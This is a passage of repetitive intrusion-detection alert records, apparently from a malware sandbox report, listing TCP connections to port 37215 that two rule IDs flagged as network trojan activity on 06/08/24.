          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.085402
          SID:2835222
          Source Port:43096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160498
          SID:2835222
          Source Port:45774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115360
          SID:2829579
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.514476
          SID:2835222
          Source Port:45582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732420
          SID:2835222
          Source Port:49962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463089
          SID:2835222
          Source Port:40784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456223
          SID:2835222
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470592
          SID:2829579
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113591
          SID:2829579
          Source Port:35034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795132
          SID:2835222
          Source Port:59874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155284
          SID:2829579
          Source Port:54534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884334
          SID:2829579
          Source Port:56496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260608
          SID:2835222
          Source Port:54714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849700
          SID:2835222
          Source Port:49538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038124
          SID:2835222
          Source Port:53766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355688
          SID:2829579
          Source Port:54404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260911
          SID:2835222
          Source Port:48818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791499
          SID:2835222
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792570
          SID:2829579
          Source Port:58710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792462
          SID:2835222
          Source Port:60022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787200
          SID:2829579
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887563
          SID:2835222
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742928
          SID:2829579
          Source Port:33620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.070893
          SID:2829579
          Source Port:43348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741447
          SID:2829579
          Source Port:39370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781953
          SID:2829579
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460825
          SID:2835222
          Source Port:59434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470357
          SID:2829579
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667083
          SID:2829579
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295671
          SID:2829579
          Source Port:46522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160577
          SID:2829579
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513760
          SID:2835222
          Source Port:44448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449621
          SID:2829579
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547980
          SID:2829579
          Source Port:33188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512854
          SID:2835222
          Source Port:46020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352378
          SID:2835222
          Source Port:51318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274130
          SID:2829579
          Source Port:49026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892215
          SID:2835222
          Source Port:57848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798933
          SID:2829579
          Source Port:52226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269880
          SID:2835222
          Source Port:49036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270721
          SID:2829579
          Source Port:37298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747842
          SID:2829579
          Source Port:50764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160637
          SID:2835222
          Source Port:59300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273008
          SID:2829579
          Source Port:55700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160979
          SID:2835222
          Source Port:55354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515508
          SID:2829579
          Source Port:40696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788215
          SID:2835222
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793372
          SID:2835222
          Source Port:35710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470576
          SID:2835222
          Source Port:49466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353127
          SID:2829579
          Source Port:47764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159201
          SID:2829579
          Source Port:35670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071505
          SID:2835222
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306490
          SID:2829579
          Source Port:34794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733605
          SID:2835222
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663833
          SID:2829579
          Source Port:35574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599950
          SID:2829579
          Source Port:34598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133184
          SID:2829579
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238862
          SID:2829579
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600869
          SID:2835222
          Source Port:50728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269949
          SID:2829579
          Source Port:40798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352655
          SID:2829579
          Source Port:59502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176194
          SID:2829579
          Source Port:47234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462651
          SID:2829579
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602045
          SID:2835222
          Source Port:54730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789621
          SID:2829579
          Source Port:58236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353007
          SID:2835222
          Source Port:48466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912978
          SID:2835222
          Source Port:44810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600899
          SID:2829579
          Source Port:55480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730067
          SID:2835222
          Source Port:51688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466651
          SID:2829579
          Source Port:55622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410154
          SID:2829579
          Source Port:57426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176418
          SID:2835222
          Source Port:43146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259986
          SID:2835222
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600031
          SID:2835222
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273334
          SID:2829579
          Source Port:38450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177003
          SID:2829579
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792696
          SID:2829579
          Source Port:50476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040136
          SID:2829579
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.804598
          SID:2835222
          Source Port:43238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892670
          SID:2835222
          Source Port:34754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236633
          SID:2835222
          Source Port:36274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133001
          SID:2835222
          Source Port:48094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884542
          SID:2835222
          Source Port:50022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745677
          SID:2835222
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239057
          SID:2829579
          Source Port:41576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465121
          SID:2835222
          Source Port:46618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738607
          SID:2835222
          Source Port:48966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152590
          SID:2829579
          Source Port:51374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861190
          SID:2829579
          Source Port:32900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017310
          SID:2829579
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780310
          SID:2829579
          Source Port:43764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020939
          SID:2835222
          Source Port:42304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352509
          SID:2829579
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706880
          SID:2829579
          Source Port:34406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259667
          SID:2835222
          Source Port:49426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233686
          SID:2835222
          Source Port:60502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797888
          SID:2835222
          Source Port:43666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743506
          SID:2829579
          Source Port:54346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461094
          SID:2835222
          Source Port:38676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295780
          SID:2829579
          Source Port:48412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511955
          SID:2829579
          Source Port:49366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039548
          SID:2829579
          Source Port:60348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747700
          SID:2835222
          Source Port:56352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857383
          SID:2829579
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446861
          SID:2835222
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.675711
          SID:2829579
          Source Port:41400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442385
          SID:2829579
          Source Port:38472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740411
          SID:2835222
          Source Port:54640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460810
          SID:2835222
          Source Port:53412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136243
          SID:2829579
          Source Port:54948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894176
          SID:2829579
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059533
          SID:2829579
          Source Port:59700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800534
          SID:2829579
          Source Port:55148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883867
          SID:2835222
          Source Port:34090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177705
          SID:2835222
          Source Port:60234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355504
          SID:2835222
          Source Port:57148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407375
          SID:2829579
          Source Port:49698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471018
          SID:2835222
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734551
          SID:2835222
          Source Port:55252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747055
          SID:2835222
          Source Port:50562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461204
          SID:2835222
          Source Port:56792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.035175
          SID:2829579
          Source Port:59300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740511
          SID:2835222
          Source Port:55524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816601
          SID:2835222
          Source Port:49416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548201
          SID:2835222
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600956
          SID:2835222
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705156
          SID:2829579
          Source Port:33728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.263772
          SID:2829579
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.815405
          SID:2835222
          Source Port:52812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881359
          SID:2829579
          Source Port:50444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709523
          SID:2835222
          Source Port:42612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466642
          SID:2829579
          Source Port:56774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.268277
          SID:2835222
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188951
          SID:2835222
          Source Port:56304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705620
          SID:2829579
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352006
          SID:2829579
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895016
          SID:2835222
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084957
          SID:2829579
          Source Port:54976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817632
          SID:2835222
          Source Port:44294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170614
          SID:2835222
          Source Port:58288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403788
          SID:2835222
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242574
          SID:2829579
          Source Port:53746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272672
          SID:2829579
          Source Port:43852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548014
          SID:2835222
          Source Port:40108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812629
          SID:2835222
          Source Port:60466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512888
          SID:2835222
          Source Port:53088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059352
          SID:2835222
          Source Port:38592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403647
          SID:2829579
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262075
          SID:2835222
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262488
          SID:2835222
          Source Port:42766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784292
          SID:2829579
          Source Port:37668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732383
          SID:2829579
          Source Port:42208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745597
          SID:2829579
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704650
          SID:2829579
          Source Port:45088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896948
          SID:2829579
          Source Port:43546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405962
          SID:2829579
          Source Port:41946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901637
          SID:2829579
          Source Port:35676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165657
          SID:2829579
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078951
          SID:2835222
          Source Port:40524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460762
          SID:2835222
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672518
          SID:2829579
          Source Port:56568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169647
          SID:2829579
          Source Port:44980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837599
          SID:2835222
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155653
          SID:2835222
          Source Port:54634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787512
          SID:2829579
          Source Port:45552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705967
          SID:2835222
          Source Port:57898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184100
          SID:2829579
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261114
          SID:2829579
          Source Port:56954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853527
          SID:2835222
          Source Port:57076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129454
          SID:2829579
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897022
          SID:2835222
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058103
          SID:2835222
          Source Port:37828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404741
          SID:2835222
          Source Port:38020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180720
          SID:2835222
          Source Port:36350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175997
          SID:2829579
          Source Port:39684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126947
          SID:2835222
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449316
          SID:2829579
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734602
          SID:2835222
          Source Port:45042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159912
          SID:2835222
          Source Port:51854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884212
          SID:2835222
          Source Port:51986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706178
          SID:2829579
          Source Port:34982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237523
          SID:2835222
          Source Port:54716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175497
          SID:2835222
          Source Port:36612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554139
          SID:2835222
          Source Port:48020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733355
          SID:2835222
          Source Port:37568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276808
          SID:2829579
          Source Port:47594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.185475
          SID:2829579
          Source Port:35330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805006
          SID:2829579
          Source Port:40938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548559
          SID:2835222
          Source Port:42664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165668
          SID:2835222
          Source Port:58694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602673
          SID:2829579
          Source Port:59242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036329
          SID:2835222
          Source Port:33510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456041
          SID:2835222
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471116
          SID:2829579
          Source Port:43606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732502
          SID:2835222
          Source Port:50750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161797
          SID:2829579
          Source Port:34888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016037
          SID:2829579
          Source Port:36618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
